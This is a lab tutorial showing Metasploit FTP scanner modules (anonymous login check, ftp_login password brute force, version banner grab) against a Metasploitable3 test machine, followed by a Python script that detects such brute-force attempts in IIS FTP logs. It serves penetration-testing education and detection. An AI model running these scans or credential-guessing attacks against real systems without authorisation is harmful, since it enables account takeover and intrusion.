
Metasploit-ftp

Overview

This article demonstrates Metasploit's FTP modules against an FTP service. You need a Metasploit attack machine and a Metasploitable3 target set up beforehand; see the earlier post on building the Kali and Metasploitable3 range.

Hands-on

  • On the attack machine, scan the target's ports; the FTP service is found on port 21
nmap -sV 192.168.56.102

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 21:42 EST
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
3389/tcp open ssl/ms-wbt-server?
4848/tcp open ssl/http Oracle Glassfish Application Server
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8181/tcp open ssl/intermapper?
8383/tcp open http Apache httpd
9200/tcp open wap-wsp?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49176/tcp open java-rmi Java RMI

Type msfconsole to enter the Metasploit console

msfconsole


=[ metasploit v6.1.14-dev ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: Open an interactive Ruby terminal with
irb

msf6 >

  • Type search scanner/ftp to list the auxiliary FTP scanner modules

image-20220224165241342

  • Below, three scanner modules (anonymous, ftp_login, ftp_version) are tested; they are also the ones most online tutorials cover

auxiliary/scanner/ftp/anonymous

Test result

Anonymous login is not supported

Walkthrough

  • Type use auxiliary/scanner/ftp/anonymous to select the anonymous-login scanner module
msf6 > use auxiliary/scanner/ftp/anonymous
  • Set RHOSTS
msf6 > set RHOSTS 192.168.56.102
  • Type run to execute the module and see whether it succeeds; here the result is that anonymous login failed
msf6 auxiliary(scanner/ftp/anonymous) > run

[*] 192.168.56.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • You can also type exploit -i to run the module
msf6 auxiliary(scanner/ftp/anonymous) > exploit -i

[*] 192.168.56.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) >

  • A screenshot of a successful run, found online

image-20220224170452788

Summary

  • If you want anonymous login to work, enable anonymous FTP in IIS on the target machine
  • After an anonymous login, some files are read-only, but important files may still leak sensitive information

auxiliary/scanner/ftp/ftp_login

Test result

Login succeeded; the decisive ingredient is the password dictionary

Walkthrough

  • Type use auxiliary/scanner/ftp/ftp_login to select this module
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) >

  • Type show options to display the current options of the ftp_login scanner
msf6 auxiliary(scanner/ftp/ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

  • Set RHOSTS
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.56.102
  • Set the thread count
msf6 auxiliary(scanner/ftp/ftp_login) >  set THREADS 14
  • Set the username/password file. The users and passwords in it ship with Metasploit; I appended one more username and password pair (vagrant) at the end
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
  • Type show options to check the configuration

image-20220224171745170

  • Run it
msf6 auxiliary(scanner/ftp/ftp_login) > run
  • Login succeeded

image-20220224171936577
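Both scanner runs above (the anonymous check and the ftp_login dictionary attack) leave a clear trace on the target, which is the defender's side of this exercise. As an added example that is not part of the original post, the following Python script parses constructed IIS FTP W3C log lines and flags a burst of failed PASS commands (status 530) from one client, any account that client subsequently logged into (status 230), and successful anonymous logins; the column layout is taken from the sample's own #Fields line, and the threshold and window are assumed values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in IIS FTP W3C log format (not from the post); the #Fields
# line defines the column order. sc-status 530 = login failed, 230 = login OK.
SAMPLE_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2022-02-24 09:17:01 192.168.56.101 root 192.168.56.102 21 PASS *** 530
2022-02-24 09:17:01 192.168.56.101 admin 192.168.56.102 21 PASS *** 530
2022-02-24 09:17:02 192.168.56.101 root 192.168.56.102 21 PASS *** 530
2022-02-24 09:17:02 192.168.56.101 test 192.168.56.102 21 PASS *** 530
2022-02-24 09:17:03 192.168.56.101 guest 192.168.56.102 21 PASS *** 530
2022-02-24 09:17:03 192.168.56.101 vagrant 192.168.56.102 21 PASS *** 230
2022-02-24 09:30:10 192.168.56.50 anonymous 192.168.56.102 21 PASS *** 230
2022-02-24 10:05:00 192.168.56.77 alice 192.168.56.102 21 PASS *** 530
"""

def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def analyze(rows, threshold=5, window=timedelta(minutes=1)):
    """Assumed policy: >= threshold failed PASS from one IP inside `window` is a brute force."""
    fails, success, anon = defaultdict(list), defaultdict(set), set()
    for r in rows:
        if r["cs-method"] != "PASS":
            continue
        ts = datetime.fromisoformat(r["date"] + " " + r["time"])
        if r["sc-status"] == "530":
            fails[r["c-ip"]].append(ts)
        elif r["sc-status"] == "230":
            success[r["c-ip"]].add(r["cs-username"])
            if r["cs-username"].lower() == "anonymous":
                anon.add(r["c-ip"])
    bruteforce = {}
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted failure timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                bruteforce[ip] = max(bruteforce.get(ip, 0), end - start + 1)
    # Accounts that a flagged client later logged into: the guessed credentials
    guessed = {ip: sorted(success[ip]) for ip in bruteforce if ip in success}
    return {"bruteforce": bruteforce, "guessed": guessed, "anonymous": sorted(anon)}
```

A client that logs in right after a burst of 530s is the pattern ftp_login leaves with STOP_ON_SUCCESS, so the "guessed" entry is the account to reset first.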

auxiliary/scanner/ftp/ftp_version

Test result

The test failed. Many online write-ups get root through this module; my analysis of why it failed here:

  • Different msf version: mine is the latest msf6, while the others used older versions
  • Different target system: some used a Linux target, while mine is Windows 2008 R2

Walkthrough

msf6 auxiliary(scanner/ftp/easy_file_sharing_ftp) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf6 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.56.102:21 - FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[*] 192.168.56.102:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • run returned only the banner '220 Microsoft FTP Service' and no FTP version number
  • I saw this person's blog state

image-20220224173453358

  • They then used the backdoor module below and finally got root

image-20220224173619958